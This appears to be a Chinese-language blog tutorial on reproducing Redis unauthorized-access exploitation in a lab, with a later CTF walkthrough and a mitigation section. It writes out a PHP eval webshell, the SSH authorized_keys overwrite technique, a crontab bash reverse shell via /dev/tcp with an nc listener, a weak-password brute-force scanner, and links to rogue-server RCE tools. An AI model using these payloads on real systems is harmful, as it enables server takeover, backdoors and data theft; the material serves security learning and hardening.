10.Redis未授權訪問漏洞復現與利用

一、漏洞簡介以及危害：

1.什么是redis未授權訪問漏洞：

Redis 默認情況下，會綁定在 0.0.0.0:6379，如果沒有進行采用相關的策略，比如添加防火牆規則避免其他非信任來源 ip 訪問等，這樣將會將 Redis 服務暴露到公網上，如果在沒有設置密碼認證（一般為空）的情況下，會導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下，利用 Redis 自身的提供的config 命令，可以進行寫文件操作，攻擊者可以成功將自己的ssh公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中，進而可以使用對應私鑰直接使用ssh服務登錄目標服務器。

簡單說，漏洞的產生條件有以下兩點：

（1）redis綁定在 0.0.0.0:6379，且沒有進行添加防火牆規則避免其他非信任來源ip訪問等相關安全策略，直接暴露在公網；
（2）沒有設置密碼認證（一般為空），可以免密碼遠程登錄redis服務。 

2.漏洞的危害：

（1）攻擊者無需認證訪問到內部數據，可能導致敏感信息泄露，黑客也可以惡意執行flushall來清空所有數據；
（2）攻擊者可通過EVAL執行lua代碼，或通過數據備份功能往磁盤寫入后門文件；
（3）最嚴重的情況，如果Redis以root身份運行，黑客可以給root賬戶寫入SSH公鑰文件，直接通過SSH登錄受害服務器

3.漏洞影響：

根據 ZoomEye 的探測，全球無驗證可直接利用Redis 分布情況如下：

全球無驗證可直接利用Redis TOP 10國家與地區：

 

二、漏洞復現：

下載並安裝測試用的Redis，本次采用的是Ubuntu鏡像：

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

(如果下載不下來的話：http://distfiles.macports.org/redis/）

解壓安裝包：tar xzf redis-2.8.17.tar.gz
進入redis目錄：cd redis-2.8.17
安裝：make

make結束后，進入src目錄：cd src，

將redis-server和redis-cli拷貝到/usr/bin目錄下（這樣啟動redis-server和redis-cli就不用每次都進入安裝目錄了）

返回目錄redis-2.8.17，將redis.conf拷貝到/etc/目錄下：

使用/etc/目錄下的reids.conf文件中的配置啟動redis服務：

服務啟動成功，我們克隆這台虛擬機

一台作為攻擊機，一台作為靶機

攻擊機IP：192.168.0.105

靶機IP：192.168.0.104

啟動redis服務進程后，就可以使用測試攻擊機程序redis-cli和靶機的redis服務交互了。 比如：

 

 

未授權訪問漏洞測試

使用redis客戶端直接無賬號成功登錄redis：

從登錄的結果可以看出該redis服務對公網開放，且未啟用認證。

 

0x01  利用redis寫webshell

利用前提：

1.靶機redis鏈接未授權，在攻擊機上能用redis-cli連上，如上圖，並未登陸驗證 2.開了web服務器，並且知道路徑（如利用phpinfo，或者錯誤爆路經），還需要具有文件讀寫增刪改查權限 （我們可以將dir設置為一個目錄a，而dbfilename為文件名b，再執行save或bgsave，則我們就可以寫入一個路徑為a/b的任意文件。）

這里由於本地搭建，我們已經知道目錄，我們把shell寫入/home/bmjoker/目錄下：

注：

第三步寫入webshell的時候，可以使用：

set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"

\r\n\r\n代表換行的意思，用redis寫入的文件會自帶一些版本信息，如果不換行可能會導致無法執行。

shell寫入完成，我們在靶機上來證明：

成功寫入shell。

當數據庫過大時，redis寫shell的小技巧：

<?php 
set_time_limit(0);
$fp=fopen('bmjoker.php','w');
fwrite($fp,'<?php @eval($_POST[\"bmjoker\"]);?>');
exit();
?>

 

0x02  利用"公私鑰"認證獲取root權限

當redis以root身份運行，可以給root賬戶寫入SSH公鑰文件，直接通過SSH登錄目標服務器。

靶機中開啟redis服務：redis-server /etc/redis.conf

在靶機中執行  mkdir /root/.ssh  命令，創建ssh公鑰存放目錄（靶機是作為ssh服務器使用的）

在攻擊機中生成ssh公鑰和私鑰，密碼設置為空：

進入.ssh目錄：cd .ssh/，將生成的公鑰保存到1.txt：

鏈接靶機上的redis服務，

將保存ssh的公鑰1.txt寫入redis（使用redis-cli -h ip命令連接靶機，將文件寫入）：

遠程登錄靶機的redis服務：redis-cli -h 192.168.0.104 

並使用 CONFIG GET dir 命令得到redis備份的路徑：

更改redis備份路徑為ssh公鑰存放目錄（一般默認為/root/.ssh）：

設置上傳公鑰的備份文件名字為authorized_keys：

檢查是否更改成功（查看有沒有authorized_keys文件），沒有問題就保存然后退出，

至此成功寫入ssh公鑰到靶機：

在攻擊機上使用ssh免密登錄靶機：ssh -i id_rsa root@192.168.0.104

利用私鑰成功登錄redis服務器！！！

 

0x03 利用crontab反彈shell

在權限足夠的情況下，利用redis寫入文件到計划任務目錄下執行。

端口監聽:

在攻擊者服務器上監聽一個端口（未被占用的任意端口）：

nc -lvnp 4444

攻擊詳情：

連接redis，寫入反彈shell

redis-cli -h 192.168.0.104
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.104/4444 0>&1\n\n"

config set dir /var/spool/cron
config set dbfilename root
save

過一分鍾左右就可以收到shell

 

 

Pyhton腳本自動化測試

 

可用來測試是否存在未授權或弱口令的情況：

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授權訪問"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令，密碼：%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

 

 

解決方案

1、比較安全的辦法是采用綁定IP的方式來進行控制。

 請在redis.conf文件找到如下配置

# If you want you can bind a single interface, if the bind option is not
# specified all the interfaces will listen for incoming connections.
#
# bind 127.0.0.1

把 #bind 127.0.0.1前面的注釋#號去掉，然后把127.0.0.1改成你允許訪問你的redis服務器的ip地址，表示只允許該ip進行訪問，這種情況下，我們在啟動redis服務器的時候不能再用:redis-server，改為:redis-server path/redis.conf 即在啟動的時候指定需要加載的配置文件,其中path/是你上面修改的redis配置文件所在目錄，這個方法有一點不太好，我難免有多台機器訪問一個redis服務。

2、設置密碼，以提供遠程登陸

打開redis.conf配置文件，找到requirepass，然后修改如下:

requirepass yourpassword
yourpassword就是redis驗證密碼，設置密碼以后發現可以登陸，但是無法執行命令了。
 
命令如下:
redis-cli -h yourIp -p yourPort//啟動redis客戶端，並連接服務器
keys * //輸出服務器中的所有key
報錯如下
(error) ERR operation not permitted
 
這時候你可以用授權命令進行授權，就不報錯了
 
命令如下:
auth youpassword

 

 -------------------------

於2018.11.23進行補充

Redis配置錯誤導致的遠程代碼漏洞溯源

在刷墨者學院的題時，發現了這個不錯的題，通過這個題了解Redis在低權限下的滲透思路：

給出了IP：219.153.49.228   ，同時也給出了倆個端口一個是web也就是http端口 419387，一個是redis數據庫端口 48055

嘗試用kali鏈接redis端口：

redis-cli -h 219.153.49.228 -p 48055

連接成功，本想用上文的方法，生成ssh密鑰把內容寫進redis數據庫，然后把redis數據庫的目錄指定到/etc/.ssh/，這樣就可以通過ssh直接連接服務器，但是這里權限不夠，不能指定到/etc/.ssh/目錄。

由於服務器是ubuntu的，apache容器，嘗試指定一下默認的路徑/var/www/html/來寫入shell:

一波寫入shell的操作，然后在web頁面嘗試訪問我們寫入shell的joker.php文件：

成功寫入，嘗試用菜刀鏈接，獲取flag:

出現這樣的問題還是權限控制的不足

 

 

-----------------------

於2019.10.9日補充

再網上收集兩個比較方便的getshell python腳本

1.https://github.com/n0b0dyCN/redis-rogue-server

漏洞利用：

2.https://github.com/Ridter/redis-rce

漏洞利用：

反彈到其他服務器：

 

參考文章：

Redis 安裝 http://www.runoob.com/redis/redis-install.html

Redis未授權訪問漏洞  http://blog.csdn.net/Hu_wen/article/details/55189777?locationNum=15&fps=1

Redis 未授權訪問配合 SSH key 文件利用分析  http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

Redis未授權訪問漏洞利用姿勢 http://www.jianshu.com/p/e550628ba1bc

                                                 https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=36100&highlight=redis